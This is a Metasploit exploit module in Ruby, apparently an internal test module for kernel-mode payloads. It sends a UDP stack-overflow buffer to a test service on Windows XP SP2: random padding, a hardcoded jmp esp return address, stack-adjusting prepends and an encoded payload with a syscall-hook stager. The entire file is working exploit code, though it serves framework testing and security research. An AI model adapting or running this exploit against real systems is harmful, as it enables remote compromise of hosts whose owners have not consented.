##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

#
# This is a test exploit for testing kernel-mode payloads.
#
class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::Udp
  include Msf::Exploit::KernelMode

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Internal Kernel-mode Test Exploit',
      'Description'    =>
        "This module tests the exploitation of a kernel-mode test service.",
      'Author'         => 'skape',
      'License'        => MSF_LICENSE,
      'Arch'           => 'x86',
      'Payload'        =>
        {
          'Space'    => 1000,
          'MaxNops'  => 0,
          'Prepend'  => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
          'PrependEncoder' => "\x81\xC4\x0C\xFE\xFF\xFF" # add esp, -500
        },
      'Targets'        =>
        [
          [
            'Windows XP SP2',
            {
              'Ret'      => 0x80502d7f, # jmp esp
              'Platform' => 'win',
              'Payload'  =>
                {
                  'ExtendedOptions' =>
                    {
                      'Stager'     => 'sud_syscall_hook',
                      'Recovery'   => 'spin'
                    }
                }
            }
          ],
        ],
      'DefaultTarget' => 0))
  end

  def autofilter
    false
  end

  def check
    return Exploit::CheckCode::Vulnerable
  end

  def exploit
    connect_udp

    print_status("Sending #{payload.encoded.length} byte payload...")

    buf =
      rand_text_alphanumeric(260) +
      "\xbe\x7f\x00\x00" +
      rand_text_alphanumeric(28) +
      [target.ret].pack('V') +
      rand_text_alphanumeric(8) +
      payload.encoded

    udp_sock.put(buf)

    select(nil,nil,nil,2)

    disconnect_udp
  end

end
